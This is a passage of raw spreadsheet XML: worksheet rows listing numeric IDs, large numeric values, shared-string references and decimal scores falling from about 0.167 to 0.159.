        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11182" ht="15.75" customHeight="1">
      <c r="A11182" s="1">
        <v>7382.0</v>
      </c>
      <c r="B11182" s="2">
        <v>5.1081645E7</v>
      </c>
      <c r="C11182" s="2" t="s">
        <v>10721</v>
      </c>
      <c r="D11182" s="2">
        <v>1.0</v>
      </c>
      <c r="E11182" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11182" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11183" ht="15.75" customHeight="1">
      <c r="A11183" s="1">
        <v>8542.0</v>
      </c>
      <c r="B11183" s="2">
        <v>5.4131101E7</v>
      </c>
      <c r="C11183" s="2" t="s">
        <v>10722</v>
      </c>
      <c r="D11183" s="2">
        <v>1.0</v>
      </c>
      <c r="E11183" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11183" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11184" ht="15.75" customHeight="1">
      <c r="A11184" s="1">
        <v>10814.0</v>
      </c>
      <c r="B11184" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C11184" s="2" t="s">
        <v>10723</v>
      </c>
      <c r="D11184" s="2">
        <v>1.0</v>
      </c>
      <c r="E11184" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11184" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11185" ht="15.75" customHeight="1">
      <c r="A11185" s="1">
        <v>17749.0</v>
      </c>
      <c r="B11185" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C11185" s="2" t="s">
        <v>10724</v>
      </c>
      <c r="D11185" s="2">
        <v>1.0</v>
      </c>
      <c r="E11185" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11185" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11186" ht="15.75" customHeight="1">
      <c r="A11186" s="1">
        <v>17856.0</v>
      </c>
      <c r="B11186" s="2">
        <v>5.0984819E7</v>
      </c>
      <c r="C11186" s="2" t="s">
        <v>10725</v>
      </c>
      <c r="D11186" s="2">
        <v>1.0</v>
      </c>
      <c r="E11186" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11186" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11187" ht="15.75" customHeight="1">
      <c r="A11187" s="1">
        <v>19148.0</v>
      </c>
      <c r="B11187" s="2">
        <v>5.4839127E7</v>
      </c>
      <c r="C11187" s="2" t="s">
        <v>10726</v>
      </c>
      <c r="D11187" s="2">
        <v>1.0</v>
      </c>
      <c r="E11187" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11187" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11188" ht="15.75" customHeight="1">
      <c r="A11188" s="1">
        <v>19157.0</v>
      </c>
      <c r="B11188" s="2">
        <v>5.4898307E7</v>
      </c>
      <c r="C11188" s="2" t="s">
        <v>10727</v>
      </c>
      <c r="D11188" s="2">
        <v>1.0</v>
      </c>
      <c r="E11188" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11188" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11189" ht="15.75" customHeight="1">
      <c r="A11189" s="1">
        <v>23936.0</v>
      </c>
      <c r="B11189" s="2">
        <v>8736117.0</v>
      </c>
      <c r="C11189" s="2" t="s">
        <v>10728</v>
      </c>
      <c r="D11189" s="2">
        <v>1.0</v>
      </c>
      <c r="E11189" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11189" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11190" ht="15.75" customHeight="1">
      <c r="A11190" s="1">
        <v>28238.0</v>
      </c>
      <c r="B11190" s="2">
        <v>2.5219337E7</v>
      </c>
      <c r="C11190" s="2" t="s">
        <v>10729</v>
      </c>
      <c r="D11190" s="2">
        <v>1.0</v>
      </c>
      <c r="E11190" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11190" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11191" ht="15.75" customHeight="1">
      <c r="A11191" s="1">
        <v>29713.0</v>
      </c>
      <c r="B11191" s="2">
        <v>3.4389663E7</v>
      </c>
      <c r="C11191" s="2" t="s">
        <v>10730</v>
      </c>
      <c r="D11191" s="2">
        <v>1.0</v>
      </c>
      <c r="E11191" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11191" s="2">
        <v>0.1659722222222222</v>
      </c>
    </row>
    <row r="11192" ht="15.75" customHeight="1">
      <c r="A11192" s="1">
        <v>4901.0</v>
      </c>
      <c r="B11192" s="2">
        <v>4.39042E7</v>
      </c>
      <c r="C11192" s="2" t="s">
        <v>10731</v>
      </c>
      <c r="D11192" s="2">
        <v>1.0</v>
      </c>
      <c r="E11192" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11192" s="2">
        <v>0.1658249158249158</v>
      </c>
    </row>
    <row r="11193" ht="15.75" customHeight="1">
      <c r="A11193" s="1">
        <v>14608.0</v>
      </c>
      <c r="B11193" s="2">
        <v>4.0251502E7</v>
      </c>
      <c r="C11193" s="2" t="s">
        <v>10732</v>
      </c>
      <c r="D11193" s="2">
        <v>1.0</v>
      </c>
      <c r="E11193" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11193" s="2">
        <v>0.1650563607085347</v>
      </c>
    </row>
    <row r="11194" ht="15.75" customHeight="1">
      <c r="A11194" s="1">
        <v>6944.0</v>
      </c>
      <c r="B11194" s="2">
        <v>4.9932056E7</v>
      </c>
      <c r="C11194" s="2" t="s">
        <v>10733</v>
      </c>
      <c r="D11194" s="2">
        <v>1.0</v>
      </c>
      <c r="E11194" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11194" s="2">
        <v>0.1650082918739636</v>
      </c>
    </row>
    <row r="11195" ht="15.75" customHeight="1">
      <c r="A11195" s="1">
        <v>5568.0</v>
      </c>
      <c r="B11195" s="2">
        <v>4.601689E7</v>
      </c>
      <c r="C11195" s="2" t="s">
        <v>10734</v>
      </c>
      <c r="D11195" s="2">
        <v>1.0</v>
      </c>
      <c r="E11195" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11195" s="2">
        <v>0.164957264957265</v>
      </c>
    </row>
    <row r="11196" ht="15.75" customHeight="1">
      <c r="A11196" s="1">
        <v>9081.0</v>
      </c>
      <c r="B11196" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C11196" s="2" t="s">
        <v>10735</v>
      </c>
      <c r="D11196" s="2">
        <v>1.0</v>
      </c>
      <c r="E11196" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11196" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="11197" ht="15.75" customHeight="1">
      <c r="A11197" s="1">
        <v>19208.0</v>
      </c>
      <c r="B11197" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C11197" s="2" t="s">
        <v>10736</v>
      </c>
      <c r="D11197" s="2">
        <v>1.0</v>
      </c>
      <c r="E11197" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11197" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="11198" ht="15.75" customHeight="1">
      <c r="A11198" s="1">
        <v>18013.0</v>
      </c>
      <c r="B11198" s="2">
        <v>5.1477148E7</v>
      </c>
      <c r="C11198" s="2" t="s">
        <v>10737</v>
      </c>
      <c r="D11198" s="2">
        <v>1.0</v>
      </c>
      <c r="E11198" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11198" s="2">
        <v>0.1647834274952919</v>
      </c>
    </row>
    <row r="11199" ht="15.75" customHeight="1">
      <c r="A11199" s="1">
        <v>8539.0</v>
      </c>
      <c r="B11199" s="2">
        <v>5.4131101E7</v>
      </c>
      <c r="C11199" s="2" t="s">
        <v>10738</v>
      </c>
      <c r="D11199" s="2">
        <v>1.0</v>
      </c>
      <c r="E11199" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11199" s="2">
        <v>0.1646464646464647</v>
      </c>
    </row>
    <row r="11200" ht="15.75" customHeight="1">
      <c r="A11200" s="1">
        <v>3992.0</v>
      </c>
      <c r="B11200" s="2">
        <v>4.0861966E7</v>
      </c>
      <c r="C11200" s="2" t="s">
        <v>10739</v>
      </c>
      <c r="D11200" s="2">
        <v>1.0</v>
      </c>
      <c r="E11200" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11200" s="2">
        <v>0.1645833333333334</v>
      </c>
    </row>
    <row r="11201" ht="15.75" customHeight="1">
      <c r="A11201" s="1">
        <v>19329.0</v>
      </c>
      <c r="B11201" s="2">
        <v>5.5323558E7</v>
      </c>
      <c r="C11201" s="2" t="s">
        <v>10740</v>
      </c>
      <c r="D11201" s="2">
        <v>1.0</v>
      </c>
      <c r="E11201" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11201" s="2">
        <v>0.1645833333333334</v>
      </c>
    </row>
    <row r="11202" ht="15.75" customHeight="1">
      <c r="A11202" s="1">
        <v>4756.0</v>
      </c>
      <c r="B11202" s="2">
        <v>4.3397495E7</v>
      </c>
      <c r="C11202" s="2" t="s">
        <v>10741</v>
      </c>
      <c r="D11202" s="2">
        <v>1.0</v>
      </c>
      <c r="E11202" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11202" s="2">
        <v>0.1645299145299146</v>
      </c>
    </row>
    <row r="11203" ht="15.75" customHeight="1">
      <c r="A11203" s="1">
        <v>6389.0</v>
      </c>
      <c r="B11203" s="2">
        <v>4.8449543E7</v>
      </c>
      <c r="C11203" s="2" t="s">
        <v>10742</v>
      </c>
      <c r="D11203" s="2">
        <v>1.0</v>
      </c>
      <c r="E11203" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11203" s="2">
        <v>0.1640625000000001</v>
      </c>
    </row>
    <row r="11204" ht="15.75" customHeight="1">
      <c r="A11204" s="1">
        <v>4229.0</v>
      </c>
      <c r="B11204" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C11204" s="2" t="s">
        <v>10743</v>
      </c>
      <c r="D11204" s="2">
        <v>1.0</v>
      </c>
      <c r="E11204" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11204" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="11205" ht="15.75" customHeight="1">
      <c r="A11205" s="1">
        <v>8625.0</v>
      </c>
      <c r="B11205" s="2">
        <v>5.4307406E7</v>
      </c>
      <c r="C11205" s="2" t="s">
        <v>10744</v>
      </c>
      <c r="D11205" s="2">
        <v>1.0</v>
      </c>
      <c r="E11205" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11205" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="11206" ht="15.75" customHeight="1">
      <c r="A11206" s="1">
        <v>18870.0</v>
      </c>
      <c r="B11206" s="2">
        <v>5.4053166E7</v>
      </c>
      <c r="C11206" s="5" t="s">
        <v>10745</v>
      </c>
      <c r="D11206" s="2">
        <v>1.0</v>
      </c>
      <c r="E11206" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11206" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="11207" ht="15.75" customHeight="1">
      <c r="A11207" s="1">
        <v>19683.0</v>
      </c>
      <c r="B11207" s="2">
        <v>5.6455759E7</v>
      </c>
      <c r="C11207" s="2" t="s">
        <v>10746</v>
      </c>
      <c r="D11207" s="2">
        <v>1.0</v>
      </c>
      <c r="E11207" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11207" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="11208" ht="15.75" customHeight="1">
      <c r="A11208" s="1">
        <v>25402.0</v>
      </c>
      <c r="B11208" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C11208" s="2" t="s">
        <v>10747</v>
      </c>
      <c r="D11208" s="2">
        <v>1.0</v>
      </c>
      <c r="E11208" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11208" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="11209" ht="15.75" customHeight="1">
      <c r="A11209" s="1">
        <v>25406.0</v>
      </c>
      <c r="B11209" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C11209" s="2" t="s">
        <v>10748</v>
      </c>
      <c r="D11209" s="2">
        <v>1.0</v>
      </c>
      <c r="E11209" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11209" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="11210" ht="15.75" customHeight="1">
      <c r="A11210" s="1">
        <v>16114.0</v>
      </c>
      <c r="B11210" s="2">
        <v>4.5410384E7</v>
      </c>
      <c r="C11210" s="2" t="s">
        <v>10749</v>
      </c>
      <c r="D11210" s="2">
        <v>1.0</v>
      </c>
      <c r="E11210" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11210" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
    <row r="11211" ht="15.75" customHeight="1">
      <c r="A11211" s="1">
        <v>4001.0</v>
      </c>
      <c r="B11211" s="2">
        <v>4.0900849E7</v>
      </c>
      <c r="C11211" s="2" t="s">
        <v>10750</v>
      </c>
      <c r="D11211" s="2">
        <v>1.0</v>
      </c>
      <c r="E11211" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11211" s="2">
        <v>0.1637731481481482</v>
      </c>
    </row>
    <row r="11212" ht="15.75" customHeight="1">
      <c r="A11212" s="1">
        <v>16791.0</v>
      </c>
      <c r="B11212" s="2">
        <v>4.7763876E7</v>
      </c>
      <c r="C11212" s="2" t="s">
        <v>10751</v>
      </c>
      <c r="D11212" s="2">
        <v>1.0</v>
      </c>
      <c r="E11212" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11212" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="11213" ht="15.75" customHeight="1">
      <c r="A11213" s="1">
        <v>16742.0</v>
      </c>
      <c r="B11213" s="2">
        <v>4.7549908E7</v>
      </c>
      <c r="C11213" s="2" t="s">
        <v>10752</v>
      </c>
      <c r="D11213" s="2">
        <v>1.0</v>
      </c>
      <c r="E11213" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11213" s="2">
        <v>0.1636225266362253</v>
      </c>
    </row>
    <row r="11214" ht="15.75" customHeight="1">
      <c r="A11214" s="1">
        <v>7131.0</v>
      </c>
      <c r="B11214" s="2">
        <v>5.0435439E7</v>
      </c>
      <c r="C11214" s="2" t="s">
        <v>10753</v>
      </c>
      <c r="D11214" s="2">
        <v>1.0</v>
      </c>
      <c r="E11214" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11214" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="11215" ht="15.75" customHeight="1">
      <c r="A11215" s="1">
        <v>13654.0</v>
      </c>
      <c r="B11215" s="2">
        <v>3.5944947E7</v>
      </c>
      <c r="C11215" s="2" t="s">
        <v>10754</v>
      </c>
      <c r="D11215" s="2">
        <v>1.0</v>
      </c>
      <c r="E11215" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11215" s="2">
        <v>0.1629001883239171</v>
      </c>
    </row>
    <row r="11216" ht="15.75" customHeight="1">
      <c r="A11216" s="1">
        <v>30835.0</v>
      </c>
      <c r="B11216" s="2">
        <v>4.5529755E7</v>
      </c>
      <c r="C11216" s="2" t="s">
        <v>10755</v>
      </c>
      <c r="D11216" s="2">
        <v>1.0</v>
      </c>
      <c r="E11216" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11216" s="2">
        <v>0.1629001883239171</v>
      </c>
    </row>
    <row r="11217" ht="15.75" customHeight="1">
      <c r="A11217" s="1">
        <v>16222.0</v>
      </c>
      <c r="B11217" s="2">
        <v>4.5711751E7</v>
      </c>
      <c r="C11217" s="2" t="s">
        <v>10756</v>
      </c>
      <c r="D11217" s="2">
        <v>1.0</v>
      </c>
      <c r="E11217" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11217" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="11218" ht="15.75" customHeight="1">
      <c r="A11218" s="1">
        <v>17664.0</v>
      </c>
      <c r="B11218" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C11218" s="2" t="s">
        <v>10757</v>
      </c>
      <c r="D11218" s="2">
        <v>1.0</v>
      </c>
      <c r="E11218" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11218" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="11219" ht="15.75" customHeight="1">
      <c r="A11219" s="1">
        <v>16994.0</v>
      </c>
      <c r="B11219" s="2">
        <v>4.8393041E7</v>
      </c>
      <c r="C11219" s="2" t="s">
        <v>10758</v>
      </c>
      <c r="D11219" s="2">
        <v>1.0</v>
      </c>
      <c r="E11219" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11219" s="2">
        <v>0.1619718309859156</v>
      </c>
    </row>
    <row r="11220" ht="15.75" customHeight="1">
      <c r="A11220" s="1">
        <v>17699.0</v>
      </c>
      <c r="B11220" s="2">
        <v>5.0569657E7</v>
      </c>
      <c r="C11220" s="2" t="s">
        <v>10759</v>
      </c>
      <c r="D11220" s="2">
        <v>1.0</v>
      </c>
      <c r="E11220" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11220" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="11221" ht="15.75" customHeight="1">
      <c r="A11221" s="1">
        <v>8436.0</v>
      </c>
      <c r="B11221" s="2">
        <v>5.3948104E7</v>
      </c>
      <c r="C11221" s="2" t="s">
        <v>10760</v>
      </c>
      <c r="D11221" s="2">
        <v>1.0</v>
      </c>
      <c r="E11221" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11221" s="2">
        <v>0.1616915422885572</v>
      </c>
    </row>
    <row r="11222" ht="15.75" customHeight="1">
      <c r="A11222" s="1">
        <v>26132.0</v>
      </c>
      <c r="B11222" s="2">
        <v>1.5940025E7</v>
      </c>
      <c r="C11222" s="2" t="s">
        <v>10761</v>
      </c>
      <c r="D11222" s="2">
        <v>1.0</v>
      </c>
      <c r="E11222" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11222" s="2">
        <v>0.1616809116809117</v>
      </c>
    </row>
    <row r="11223" ht="15.75" customHeight="1">
      <c r="A11223" s="1">
        <v>9428.0</v>
      </c>
      <c r="B11223" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C11223" s="2" t="s">
        <v>10762</v>
      </c>
      <c r="D11223" s="2">
        <v>1.0</v>
      </c>
      <c r="E11223" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11223" s="2">
        <v>0.1615384615384615</v>
      </c>
    </row>
    <row r="11224" ht="15.75" customHeight="1">
      <c r="A11224" s="1">
        <v>18403.0</v>
      </c>
      <c r="B11224" s="2">
        <v>5.2636682E7</v>
      </c>
      <c r="C11224" s="2" t="s">
        <v>10763</v>
      </c>
      <c r="D11224" s="2">
        <v>1.0</v>
      </c>
      <c r="E11224" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11224" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="11225" ht="15.75" customHeight="1">
      <c r="A11225" s="1">
        <v>20587.0</v>
      </c>
      <c r="B11225" s="2">
        <v>1.3770601E7</v>
      </c>
      <c r="C11225" s="2" t="s">
        <v>10764</v>
      </c>
      <c r="D11225" s="2">
        <v>1.0</v>
      </c>
      <c r="E11225" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11225" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="11226" ht="15.75" customHeight="1">
      <c r="A11226" s="1">
        <v>29944.0</v>
      </c>
      <c r="B11226" s="2">
        <v>3607504.0</v>
      </c>
      <c r="C11226" s="2" t="s">
        <v>10765</v>
      </c>
      <c r="D11226" s="2">
        <v>1.0</v>
      </c>
      <c r="E11226" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11226" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="11227" ht="15.75" customHeight="1">
      <c r="A11227" s="1">
        <v>3856.0</v>
      </c>
      <c r="B11227" s="2">
        <v>4.0301345E7</v>
      </c>
      <c r="C11227" s="5" t="s">
        <v>10766</v>
      </c>
      <c r="D11227" s="2">
        <v>1.0</v>
      </c>
      <c r="E11227" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11227" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="11228" ht="15.75" customHeight="1">
      <c r="A11228" s="1">
        <v>7350.0</v>
      </c>
      <c r="B11228" s="2">
        <v>5.0986361E7</v>
      </c>
      <c r="C11228" s="2" t="s">
        <v>10767</v>
      </c>
      <c r="D11228" s="2">
        <v>1.0</v>
      </c>
      <c r="E11228" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11228" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="11229" ht="15.75" customHeight="1">
      <c r="A11229" s="1">
        <v>18419.0</v>
      </c>
      <c r="B11229" s="2">
        <v>5.269047E7</v>
      </c>
      <c r="C11229" s="2" t="s">
        <v>10768</v>
      </c>
      <c r="D11229" s="2">
        <v>1.0</v>
      </c>
      <c r="E11229" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11229" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="11230" ht="15.75" customHeight="1">
      <c r="A11230" s="1">
        <v>14225.0</v>
      </c>
      <c r="B11230" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C11230" s="2" t="s">
        <v>10769</v>
      </c>
      <c r="D11230" s="2">
        <v>1.0</v>
      </c>
      <c r="E11230" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11230" s="2">
        <v>0.1609848484848485</v>
      </c>
    </row>
    <row r="11231" ht="15.75" customHeight="1">
      <c r="A11231" s="1">
        <v>9268.0</v>
      </c>
      <c r="B11231" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C11231" s="2" t="s">
        <v>10770</v>
      </c>
      <c r="D11231" s="2">
        <v>1.0</v>
      </c>
      <c r="E11231" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11231" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="11232" ht="15.75" customHeight="1">
      <c r="A11232" s="1">
        <v>31011.0</v>
      </c>
      <c r="B11232" s="2">
        <v>4771280.0</v>
      </c>
      <c r="C11232" s="2" t="s">
        <v>10771</v>
      </c>
      <c r="D11232" s="2">
        <v>1.0</v>
      </c>
      <c r="E11232" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11232" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="11233" ht="15.75" customHeight="1">
      <c r="A11233" s="1">
        <v>15699.0</v>
      </c>
      <c r="B11233" s="2">
        <v>4.3923978E7</v>
      </c>
      <c r="C11233" s="2" t="s">
        <v>10772</v>
      </c>
      <c r="D11233" s="2">
        <v>1.0</v>
      </c>
      <c r="E11233" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11233" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="11234" ht="15.75" customHeight="1">
      <c r="A11234" s="1">
        <v>8411.0</v>
      </c>
      <c r="B11234" s="2">
        <v>5.390067E7</v>
      </c>
      <c r="C11234" s="2" t="s">
        <v>10773</v>
      </c>
      <c r="D11234" s="2">
        <v>1.0</v>
      </c>
      <c r="E11234" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11234" s="2">
        <v>0.1605902777777778</v>
      </c>
    </row>
    <row r="11235" ht="15.75" customHeight="1">
      <c r="A11235" s="1">
        <v>556.0</v>
      </c>
      <c r="B11235" s="2">
        <v>1.8818131E7</v>
      </c>
      <c r="C11235" s="2" t="s">
        <v>10774</v>
      </c>
      <c r="D11235" s="2">
        <v>1.0</v>
      </c>
      <c r="E11235" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11235" s="2">
        <v>0.1605783866057839</v>
      </c>
    </row>
    <row r="11236" ht="15.75" customHeight="1">
      <c r="A11236" s="1">
        <v>4360.0</v>
      </c>
      <c r="B11236" s="2">
        <v>4.2117181E7</v>
      </c>
      <c r="C11236" s="2" t="s">
        <v>10775</v>
      </c>
      <c r="D11236" s="2">
        <v>1.0</v>
      </c>
      <c r="E11236" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11236" s="2">
        <v>0.1604068857589985</v>
      </c>
    </row>
    <row r="11237" ht="15.75" customHeight="1">
      <c r="A11237" s="1">
        <v>16886.0</v>
      </c>
      <c r="B11237" s="2">
        <v>4.8016621E7</v>
      </c>
      <c r="C11237" s="2" t="s">
        <v>10776</v>
      </c>
      <c r="D11237" s="2">
        <v>1.0</v>
      </c>
      <c r="E11237" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11237" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="11238" ht="15.75" customHeight="1">
      <c r="A11238" s="1">
        <v>29861.0</v>
      </c>
      <c r="B11238" s="2">
        <v>3.5820415E7</v>
      </c>
      <c r="C11238" s="2" t="s">
        <v>10777</v>
      </c>
      <c r="D11238" s="2">
        <v>1.0</v>
      </c>
      <c r="E11238" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11238" s="2">
        <v>0.1598079561042524</v>
      </c>
    </row>
    <row r="11239" ht="15.75" customHeight="1">
      <c r="A11239" s="1">
        <v>7896.0</v>
      </c>
      <c r="B11239" s="2">
        <v>5.2443231E7</v>
      </c>
      <c r="C11239" s="2" t="s">
        <v>10778</v>
      </c>
      <c r="D11239" s="2">
        <v>1.0</v>
      </c>
      <c r="E11239" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11239" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="11240" ht="15.75" customHeight="1">
      <c r="A11240" s="1">
        <v>11228.0</v>
      </c>
      <c r="B11240" s="2">
        <v>2.0318288E7</v>
      </c>
      <c r="C11240" s="2" t="s">
        <v>10779</v>
      </c>
      <c r="D11240" s="2">
        <v>1.0</v>
      </c>
      <c r="E11240" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11240" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="11241" ht="15.75" customHeight="1">
      <c r="A11241" s="1">
        <v>19103.0</v>
      </c>
      <c r="B11241" s="2">
        <v>5.4721831E7</v>
      </c>
      <c r="C11241" s="2" t="s">
        <v>10780</v>
      </c>
      <c r="D11241" s="2">
        <v>1.0</v>
      </c>
      <c r="E11241" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11241" s="2">
        <v>0.1596119929453264</v>
      </c>
    </row>
    <row r="11242" ht="15.75" customHeight="1">
      <c r="A11242" s="1">
        <v>20867.0</v>
      </c>
      <c r="B11242" s="2">
        <v>1.59122E7</v>
      </c>
      <c r="C11242" s="2" t="s">
        <v>10781</v>
      </c>
      <c r="D11242" s="2">
        <v>1.0</v>
      </c>
      <c r="E11242" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11242" s="2">
        <v>0.1596119929453264</v>
      </c>
    </row>
    <row r="11243" ht="15.75" customHeight="1">
      <c r="A11243" s="1">
        <v>3017.0</v>
      </c>
      <c r="B11243" s="2">
        <v>3.6404551E7</v>
      </c>
      <c r="C11243" s="2" t="s">
        <v>10782</v>
      </c>
      <c r="D11243" s="2">
        <v>1.0</v>
      </c>
      <c r="E11243" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11243" s="2">
        <v>0.1593806921675774</v>
      </c>
    </row>
    <row r="11244" ht="15.75" customHeight="1">
      <c r="A11244" s="1">
        <v>15493.0</v>
      </c>
      <c r="B11244" s="2">
        <v>4.3201075E7</v>
      </c>
      <c r="C11244" s="2" t="s">
        <v>10783</v>
      </c>
      <c r="D11244" s="2">
        <v>1.0</v>
      </c>
      <c r="E11244" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11244" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="11245" ht="15.75" customHeight="1">
      <c r="A11245" s="1">
        <v>15496.0</v>
      </c>
      <c r="B11245" s="2">
        <v>4.3201183E7</v>
      </c>
      <c r="C11245" s="2" t="s">
        <v>10783</v>
      </c>
      <c r="D11245" s="2">
        <v>1.0</v>
      </c>
      <c r="E11245" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11245" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="11246" ht="15.75" customHeight="1">
      <c r="A11246" s="1">
        <v>9451.0</v>
      </c>
      <c r="B11246" s="2">
        <v>5.5844044E7</v>
      </c>
      <c r="C11246" s="2" t="s">
        <v>10784</v>
      </c>
      <c r="D11246" s="2">
        <v>1.0</v>
      </c>
      <c r="E11246" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11246" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="11247" ht="15.75" customHeight="1">
      <c r="A11247" s="1">
        <v>18402.0</v>
      </c>
      <c r="B11247" s="2">
        <v>5.2636682E7</v>
      </c>
      <c r="C11247" s="2" t="s">
        <v>10785</v>
      </c>
      <c r="D11247" s="2">
        <v>1.0</v>
      </c>
      <c r="E11247" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11247" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="11248" ht="15.75" customHeight="1">
      <c r="A11248" s="1">
        <v>6906.0</v>
      </c>
      <c r="B11248" s="2">
        <v>4.9816708E7</v>
      </c>
      <c r="C11248" s="2" t="s">
        <v>10786</v>
      </c>
      <c r="D11248" s="2">
        <v>1.0</v>
      </c>
      <c r="E11248" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11248" s="2">
